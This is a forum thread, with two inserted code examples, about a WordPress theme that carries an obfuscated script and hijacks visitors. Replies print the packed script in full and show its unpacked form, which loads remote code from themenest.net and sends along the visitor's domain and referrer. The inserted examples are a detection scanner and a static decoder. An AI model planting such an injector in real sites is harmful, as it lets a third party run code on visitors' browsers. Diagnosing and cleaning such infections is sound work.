My website is getting hijacked every nth click?

nboy22

Diamond Member
Hey everyone, just looking for some advice here.

My website, www.brandonclark.net, seems to be getting hijacked every so often. I know it is NOT my web browser, because it is tested from 4 different machines. If you keep clicking all the links, eventually it will get hijacked.

It doesn't even make sense, it is from a clean install of wordpress and a theme. I am still in the process of setting it up and this has been happening from the beginning. Is there any logging system I can use to log where this is coming from so I can narrow it down and eliminate it?

Thanks for any advice!
 
http://wordpress.org/support/topic/wordpress-sites-getting-redirected

I got redirected after the 3rd click.
http://www.unmaskparasites.com/security-report/ found this script:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c-...

I dunno what that means...

Thanks, let me look into this. I found another thread about this function and someone figured out how to take it out or modify something that might have to do with the hijacker.
 
Well if you're using a minimized JavaScript library it may be packed.

What version of WordPress are you using?
 
1) Find a great web host (GoDaddy.com doesn't qualify) with proactive and quality support; unfortunately, a great web host costs $$.

2) It's not uncommon for WP to get hacked, there are dozens of threads like this on WebHostingTalk.com:
http://www.webhostingtalk.com/showthread.php?t=1148386

Keep it updated and secure constantly, it's almost as bad as phpBB forum software.
 
Have several domains hosted with godaddy, they've NEVER been hacked.
 
I don't really think it's a godaddy issue. Whatever it is, it is deep rooted somewhere and I will probably just end up reinstalling the theme and copying all my pages over to get rid of it. I'm downloading all site files and going to run a search on all files for "eval(base64_decode" and see if it catches anything suspicious. I am not really a web programmer so where all these malware hacks could be hiding is not too clear to me.
 
Where did you get the theme?
 
The issue with using popular CMSes like WordPress is that if they have any security holes, a lot of hackers and script kiddies know about them.

Hackers actually Google the copyright notice at the bottom of known web apps so they can find sites to exploit, and they just go at it.
 
Fun stuff. Bastards. Oh well I suppose I'll just copy the code for each page I have and then reinstall the theme and then backup before something like this happens again.
 
I manage multiple WordPress websites and have had several hacked before.

Things to check:

1. Check your .htaccess file. Look for signs of unauthorized redirects. If it looks weird, it's probably a hack.

2. Look in the header of your theme php files. If the code looks weird, it's a hack.

3. Did you download all of your plugins and theme from a legit source? Did you download any cracks? If you pirated any plugins or your theme, the hack came with it.
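
The checks listed above, together with the `eval(base64_decode` search mentioned earlier in the thread, as an added Node.js example that is not part of any post. The rule ids, the `ownHosts` parameter and the 2 MB size limit are assumptions of this example.

```javascript
// Added example: indicator checks for an offline copy of a WordPress site.
// Rule ids, `ownHosts` and the 2 MB size limit are assumptions of this example.
const CONTENT_RULES = [
  // Dean Edwards packer header, as in the script reported earlier in the thread
  { id: 'js-packer', files: /\.(php|js|html?)$/i,
    re: /eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,/ },
  // The PHP pattern the original poster planned to search for, whitespace-tolerant
  { id: 'php-eval-b64', files: /\.php$/i, re: /eval\s*\(\s*base64_decode\s*\(/i },
  // A script tag split across string pieces so that a search for "<script" misses it
  { id: 'split-script', files: /\.(php|js|html?)$/i, re: /<scr['"]\s*\+\s*['"]ipt/i },
];

// Scan one file's text; returns [{ path, line, rule }].
function scanText(path, text, ownHosts = []) {
  const findings = [];
  const isHtaccess = /(^|[\\/])\.htaccess$/.test(path);
  text.split(/\r?\n/).forEach((line, i) => {
    for (const rule of CONTENT_RULES) {
      if (rule.files.test(path) && rule.re.test(line)) {
        findings.push({ path, line: i + 1, rule: rule.id });
      }
    }
    // .htaccess: redirect directives whose target is a literal host other than our own
    if (isHtaccess && /^\s*(RewriteRule|Redirect(Match)?)\b/i.test(line)) {
      const target = /https?:\/\/([^\/\s%$]+)/i.exec(line);
      if (target && !ownHosts.includes(target[1].toLowerCase())) {
        findings.push({ path, line: i + 1, rule: 'htaccess-offsite' });
      }
    }
  });
  return findings;
}

// Walk a directory tree (Node.js only) and scan every regular file under 2 MB.
function scanTree(root, ownHosts = []) {
  const fs = require('fs');
  const path = require('path');
  const findings = [];
  for (const entry of fs.readdirSync(root, { withFileTypes: true })) {
    const full = path.join(root, entry.name);
    if (entry.isDirectory()) findings.push(...scanTree(full, ownHosts));
    else if (entry.isFile() && fs.statSync(full).size < 2 * 1024 * 1024) {
      findings.push(...scanText(full, fs.readFileSync(full, 'utf8'), ownHosts));
    }
  }
  return findings;
}
```

A `js-packer` hit is a lead rather than a verdict, since a minimized JavaScript library may be packed the same way, as noted earlier in the thread.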
 
This is what the packed script unpacks to:

Code:
document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');

A Google search for themenest.net serving malware brings up some similar hits, including an identical problem to yours:

http://stackoverflow.com/questions/14476868/my-website-redirects-to-malicious-sites

That site is not to be trusted. I assume that is where you got your theme, and they are intentionally embedding obfuscated javascript into the theme - not only tracking your visitors, but executing anything they want whenever they want.


http://www.networksolutions.com/whois/results.jsp?domain=themenest.net

Technical Contact: AnonymousSpeech AnonyousSpeech AnonymousSpeech (contact@anonymousspeech.com) +81.09037462746 Fax: +81.09037462746 1-3-3 Sakura House Tokyo, TOKYO 169-0072 JP
 
I removed the script that I think pertained to this information at the top of my header.php. Hopefully that works. I am having a friend test it because for some weird reason it doesn't show me the spam on 3 different browsers on my computer and I'm not even logged into wordpress.
 
Awesome, that did the trick. Seems like the spam is gone for now. We shall see if it stays that way. Thanks guys for all your help, you have saved me a lot of time!
 
You're in Phoenix but have an Idaho (208) phone number?

 
Yup lol. My parents have a family plan so I just contribute to make it cheaper for everyone and I don't think sprint will let me change my number, at least quite a few years ago they wouldn't. Not sure if anything has changed now.
 
Check the header file from the theme that you're using for this string:

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

Then see if there's a cache folder anywhere in the Wordpress directory or subdirectories and clear out anything in there. That should take care of it. Then lock that bad boy down so it don't happen again. Real pain in the butt. Hope this helps
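
The unpacking discussed in this thread, done statically so the injected code is never executed, as an added example that is not part of the original post. `SAMPLE` is the packed string quoted above without its `<script>` tags; the function names are assumptions, and only radix values up to 36 are handled.

```javascript
// Added example: static decoder for the "p,a,c,k,e,r" wrapper. Nothing is eval()'d.
// SAMPLE is the packed string quoted in the post above, without its <script> tags.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}))`;

// Read a single-quoted JS string literal that opens at src[start].
function readQuoted(src, start) {
  let out = '';
  for (let i = start + 1; i < src.length; i++) {
    if (src[i] === '\\') { out += src[++i]; continue; } // \' -> '   \\ -> \
    if (src[i] === "'") return { value: out, end: i + 1 };
    out += src[i];
  }
  throw new Error('unterminated string literal');
}

function unpack(packed) {
  // Call arguments follow the wrapper body: }('payload',radix,count,'w0|w1|...'.split('|')
  const at = packed.indexOf("}('");
  if (at === -1) throw new Error('not a p,a,c,k,e,r wrapper');
  const payload = readQuoted(packed, at + 2);
  const nums = /^,(\d+),(\d+),(?=')/.exec(packed.slice(payload.end));
  if (!nums) throw new Error('radix/count arguments not found');
  const radix = Number(nums[1]);
  if (radix < 2 || radix > 36) throw new Error('unsupported radix ' + radix);
  const words = readQuoted(packed, payload.end + nums[0].length).value.split('|');
  if (words.length !== Number(nums[2])) throw new Error('dictionary size mismatch');
  // Each word-token is a base-`radix` index into the dictionary; an empty
  // dictionary slot means the token stands for itself.
  return payload.value.replace(/\b\w+\b/g, (tok) => {
    const idx = parseInt(tok, radix);
    return idx.toString(radix) === tok && words[idx] ? words[idx] : tok;
  });
}

// Hostnames the decoded code would contact: the strings to search the site files for.
function remoteHosts(code) {
  const hosts = [...code.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)].map((m) => m[1].toLowerCase());
  return [...new Set(hosts)];
}

console.log(unpack(SAMPLE));
console.log(remoteHosts(unpack(SAMPLE)));
```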
 